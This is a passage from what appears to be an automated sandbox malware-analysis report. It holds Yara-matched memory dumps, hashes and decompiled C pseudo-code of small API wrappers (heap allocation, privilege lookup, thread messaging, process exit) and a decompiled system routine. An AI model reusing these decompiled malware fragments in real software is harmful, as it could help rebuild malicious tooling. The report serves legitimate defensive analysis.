                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 299515b6a4c4b7fe34a0254a828e2e35bbff23895406936d62d23753fc4f2dc5
                                                • Instruction ID: 2d85129770ae1569db338c81f9331519a7dd6e0895954f6df8c699ab0d1d1ce1
                                                • Opcode Fuzzy Hash: 299515b6a4c4b7fe34a0254a828e2e35bbff23895406936d62d23753fc4f2dc5
                                                • Instruction Fuzzy Hash: C5212BB2C442085BCB11E6609D42BFF736C9B14304F04017FE989A3181FA38AB498BA7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00418880(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                				void* _t10;
                                                
                                                				E004191B0(_a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                				_t6 =  &_a8; // 0x413526
                                                				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                                				return _t10;
                                                			}





                                                APIs
                                                • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID: &5A
                                                • API String ID: 1279760036-1617645808
                                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction ID: 4ef14f879dafae0d6951d5bd0a6bbd37283b7ec5dd2ccf2ca50cdce3f5cd3bdb
                                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction Fuzzy Hash: 6CE012B1200208ABDB14EF99CC45EA777ADAF88654F158559FA095B242CA30F910CAF4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
                                                				char _v67;
                                                				char _v68;
                                                				void* _t12;
                                                				intOrPtr* _t13;
                                                				int _t14;
                                                				long _t21;
                                                				intOrPtr* _t25;
                                                				void* _t26;
                                                
                                                				_v68 = 0;
                                                				E0041A110( &_v67, 0, 0x3f);
                                                				E0041ACF0( &_v68, 3);
                                                				_t12 = E00409B30(_a4 + 0x1c,  &_v68); // executed
                                                				_t13 = E00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                				_t25 = _t13;
                                                				if(_t25 != 0) {
                                                					_t21 = _a8;
                                                					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                					if(_t14 == 0) {
                                                						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(1, 8) & 0x000000ff) - 0x40, _t14);
                                                					}
                                                					return _t14;
                                                				}
                                                				return _t13;
                                                			}












                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 14624e8db26b89bccf1705d7108d041dc2e52ca21b332cab295bc8e658a3c696
                                                • Instruction ID: 7737b7532069fc333edaf9b0832c3edc759e3be1fb1c5433828103526b109584
                                                • Opcode Fuzzy Hash: 14624e8db26b89bccf1705d7108d041dc2e52ca21b332cab295bc8e658a3c696
                                                • Instruction Fuzzy Hash: 36018431A8022876E721A6959C03FFE776C5B00B55F15416EFF04BA1C2E6A87A0546EA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004188C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                				char _t10;
                                                
                                                				_t3 = _a4 + 0xc74; // 0xc74
                                                				E004191B0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                				return _t10;
                                                 			}

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 004188ED
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction ID: 8f9b7065ee004bfc107c5e1a3206d22b1dba8f53d1ba42c3d4a522b3320012f0
                                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction Fuzzy Hash: C0E012B1200208ABDB18EF99CC49EA777ADAF88750F018559FA095B242CA30E910CAF4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00418A1D(void* __eax, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                				int _t13;
                                                
                                                				_t10 = _a4;
                                                				E004191B0(_a4, _a4 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
                                                				_t13 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                				return _t13;
                                                 			}

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A50
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 230345fddafc7c1142e560332d58448e30981c5bc08d36f350fb755b2e123772
                                                • Instruction ID: 91a00bbe38a7838b94ce213e5fbfdae2ee5a5183c342f51ec8d27c51e137ae99
                                                • Opcode Fuzzy Hash: 230345fddafc7c1142e560332d58448e30981c5bc08d36f350fb755b2e123772
                                                • Instruction Fuzzy Hash: ADE01AB16002046BEB10DF95DC84FE737AAAF88350F158155FA0DAB241CA35E855CBB4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00418A20(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                				int _t10;
                                                
                                                				E004191B0(_a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                				return _t10;
                                                 			}

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A50
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction ID: 62f155a2f2b834774e03dd9f5cc664d450e5ddbb18d5cf86998e13752e76a9ec
                                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction Fuzzy Hash: 6EE01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0957241CA34E8508BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00418900(intOrPtr _a4, int _a8) {
                                                
                                                				_t5 = _a4;
                                                				E004191B0(_a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                				ExitProcess(_a8);
                                                 			}

                                                APIs
                                                • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418928
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction ID: 622c55a551f2a3710ca15f35a1068b8193fa72338b31a42c8a230178039be0f3
                                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction Fuzzy Hash: 3FD012716002147BD620DB99CC85FD777ACDF48750F058065BA1D5B241C531BA00C6E5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0c2ae3e5df6120d257ad6511da159de35997602f269a8575f0d57cb1e9a201f8
                                                • Instruction ID: 78dcef61c35556fee7d3ed98e483380662f12c9fd41c46dad2725844ffff7127
                                                • Opcode Fuzzy Hash: 0c2ae3e5df6120d257ad6511da159de35997602f269a8575f0d57cb1e9a201f8
                                                • Instruction Fuzzy Hash: 80C01247E4011A4766210849A9023B9FBA4D242061E707293DC86E3621D102C96656C9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                                • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E00938788(signed int __ecx, void* __edx, signed int _a4) {
                                                				signed int _v8;
                                                				short* _v12;
                                                				void* _v16;
                                                				signed int _v20;
                                                				char _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				char _v36;
                                                				signed int _v40;
                                                				char _v44;
                                                				signed int _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				signed int _v60;
                                                				char _v68;
                                                				void* _t216;
                                                				intOrPtr _t231;
                                                				short* _t235;
                                                				intOrPtr _t257;
                                                				short* _t261;
                                                				intOrPtr _t284;
                                                				intOrPtr _t288;
                                                				void* _t314;
                                                				signed int _t318;
                                                				short* _t319;
                                                				intOrPtr _t321;
                                                				void* _t328;
                                                				void* _t329;
                                                				char* _t332;
                                                				signed int _t333;
                                                				signed int* _t334;
                                                				void* _t335;
                                                				void* _t338;
                                                				void* _t339;
                                                
                                                				_t328 = __edx;
                                                				_t322 = __ecx;
                                                				_t318 = 0;
                                                				_t334 = _a4;
                                                				_v8 = 0;
                                                				_v28 = 0;
                                                				_v48 = 0;
                                                				_v20 = 0;
                                                				_v40 = 0;
                                                				_v32 = 0;
                                                				_v52 = 0;
                                                				if(_t334 == 0) {
                                                					_t329 = 0xc000000d;
                                                					L49:
                                                					_t334[0x11] = _v56;
                                                					 *_t334 =  *_t334 | 0x00000800;
                                                					_t334[0x12] = _v60;
                                                					_t334[0x13] = _v28;
                                                					_t334[0x17] = _v20;
                                                					_t334[0x16] = _v48;
                                                					_t334[0x18] = _v40;
                                                					_t334[0x14] = _v32;
                                                					_t334[0x15] = _v52;
                                                					return _t329;
                                                				}
                                                				_v56 = 0;
                                                				if(E00938460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                					_v56 = 1;
                                                					if(_v8 != 0) {
                                                						_t207 = E0091E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                					}
                                                					_push(1);
                                                					_v8 = _t318;
                                                					E0093718A(_t207);
                                                					_t335 = _t335 + 4;
                                                				}
                                                				_v60 = _v60 | 0xffffffff;
                                                				if(E00938460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                					_t333 =  *_v8;
                                                					_v60 = _t333;
                                                					_t314 = E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                					_push(_t333);
                                                					_v8 = _t318;
                                                					E0093718A(_t314);
                                                					_t335 = _t335 + 4;
                                                				}
                                                				_t216 = E00938460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                				_t332 = ";";
                                                				if(_t216 < 0) {
                                                					L17:
                                                					if(E00938460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                						L30:
                                                						if(E00938460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                							L46:
                                                							_t329 = 0;
                                                							L47:
                                                							if(_v8 != _t318) {
                                                								E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                							}
                                                							if(_v28 != _t318) {
                                                								if(_v20 != _t318) {
                                                									E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                									_v20 = _t318;
                                                									_v40 = _t318;
                                                								}
                                                							}
                                                							goto L49;
                                                						}
                                                						_t231 = _v24;
                                                						_t322 = _t231 + 4;
                                                						_push(_t231);
                                                						_v52 = _t322;
                                                						E0093718A(_t231);
                                                						if(_t322 == _t318) {
                                                							_v32 = _t318;
                                                						} else {
                                                							_v32 = E0091E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                						}
                                                						if(_v32 == _t318) {
                                                							_v52 = _t318;
                                                							L58:
                                                							_t329 = 0xc0000017;
                                                							goto L47;
                                                						} else {
                                                							E00912340(_v32, _v8, _v24);
                                                							_v16 = _v32;
                                                							_a4 = _t318;
                                                							_t235 = E0092E679(_v32, _t332);
                                                							while(1) {
                                                								_t319 = _t235;
                                                								if(_t319 == 0) {
                                                									break;
                                                								}
                                                								 *_t319 = 0;
                                                								_t321 = _t319 + 2;
                                                								E0091E2A8(_t322,  &_v68, _v16);
                                                								if(E00935553(_t328,  &_v68,  &_v36) != 0) {
                                                									_a4 = _a4 + 1;
                                                								}
                                                								_v16 = _t321;
                                                								_t235 = E0092E679(_t321, _t332);
                                                								_pop(_t322);
                                                							}
                                                							_t236 = _v16;
                                                							if( *_v16 != _t319) {
                                                								E0091E2A8(_t322,  &_v68, _t236);
                                                								if(E00935553(_t328,  &_v68,  &_v36) != 0) {
                                                									_a4 = _a4 + 1;
                                                								}
                                                							}
                                                							if(_a4 == 0) {
                                                								E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                								_v52 = _v52 & 0x00000000;
                                                								_v32 = _v32 & 0x00000000;
                                                							}
                                                							if(_v8 != 0) {
                                                								E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                							}
                                                							_v8 = _v8 & 0x00000000;
                                                							_t318 = 0;
                                                							goto L46;
                                                						}
                                                					}
                                                					_t257 = _v24;
                                                					_t322 = _t257 + 4;
                                                					_push(_t257);
                                                					_v40 = _t322;
                                                					E0093718A(_t257);
                                                					_t338 = _t335 + 4;
                                                					if(_t322 == _t318) {
                                                						_v20 = _t318;
                                                					} else {
                                                						_v20 = E0091E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                					}
                                                					if(_v20 == _t318) {
                                                						_v40 = _t318;
                                                						goto L58;
                                                					} else {
                                                						E00912340(_v20, _v8, _v24);
                                                						_v16 = _v20;
                                                						_a4 = _t318;
                                                						_t261 = E0092E679(_v20, _t332);
                                                						_t335 = _t338 + 0x14;
                                                						while(1) {
                                                							_v12 = _t261;
                                                							if(_t261 == _t318) {
                                                								break;
                                                							}
                                                							_v12 = _v12 + 2;
                                                							 *_v12 = 0;
                                                							E0091E2A8(_v12,  &_v68, _v16);
                                                							if(E00935553(_t328,  &_v68,  &_v36) != 0) {
                                                								_a4 = _a4 + 1;
                                                							}
                                                							_v16 = _v12;
                                                							_t261 = E0092E679(_v12, _t332);
                                                							_pop(_t322);
                                                						}
                                                						_t269 = _v16;
                                                						if( *_v16 != _t318) {
                                                							E0091E2A8(_t322,  &_v68, _t269);
                                                							if(E00935553(_t328,  &_v68,  &_v36) != 0) {
                                                								_a4 = _a4 + 1;
                                                							}
                                                						}
                                                						if(_a4 == _t318) {
                                                							E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                							_v40 = _t318;
                                                							_v20 = _t318;
                                                						}
                                                						if(_v8 != _t318) {
                                                							E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                						}
                                                						_v8 = _t318;
                                                						goto L30;
                                                					}
                                                				}
                                                				_t284 = _v24;
                                                				_t322 = _t284 + 4;
                                                				_push(_t284);
                                                				_v48 = _t322;
                                                				E0093718A(_t284);
                                                				_t339 = _t335 + 4;
                                                				if(_t322 == _t318) {
                                                					_v28 = _t318;
                                                				} else {
                                                					_v28 = E0091E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                				}
                                                				if(_v28 == _t318) {
                                                					_v48 = _t318;
                                                					goto L58;
                                                				} else {
                                                					E00912340(_v28, _v8, _v24);
                                                					_v16 = _v28;
                                                					_a4 = _t318;
                                                					_t288 = E0092E679(_v28, _t332);
                                                					_t335 = _t339 + 0x14;
                                                					while(1) {
                                                						_v12 = _t288;
                                                						if(_t288 == _t318) {
                                                							break;
                                                						}
                                                						_v12 = _v12 + 2;
                                                						 *_v12 = 0;
                                                						E0091E2A8(_v12,  &_v68, _v16);
                                                						if(E00935553(_t328,  &_v68,  &_v36) != 0) {
                                                							_a4 = _a4 + 1;
                                                						}
                                                						_v16 = _v12;
                                                						_t288 = E0092E679(_v12, _t332);
                                                						_pop(_t322);
                                                					}
                                                					_t296 = _v16;
                                                					if( *_v16 != _t318) {
                                                						E0091E2A8(_t322,  &_v68, _t296);
                                                						if(E00935553(_t328,  &_v68,  &_v36) != 0) {
                                                							_a4 = _a4 + 1;
                                                						}
                                                					}
                                                					if(_a4 == _t318) {
                                                						E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                						_v48 = _t318;
                                                						_v28 = _t318;
                                                					}
                                                					if(_v8 != _t318) {
                                                						E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                					}
                                                					_v8 = _t318;
                                                					goto L17;
                                                				}
                                                 			}

                                                APIs
                                                Strings
                                                • Kernel-MUI-Number-Allowed, xrefs: 009387E6
                                                • Kernel-MUI-Language-SKU, xrefs: 009389FC
                                                • WindowsExcludedProcs, xrefs: 009387C1
                                                • Kernel-MUI-Language-Allowed, xrefs: 00938827
                                                • Kernel-MUI-Language-Disallowed, xrefs: 00938914
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: _wcspbrk
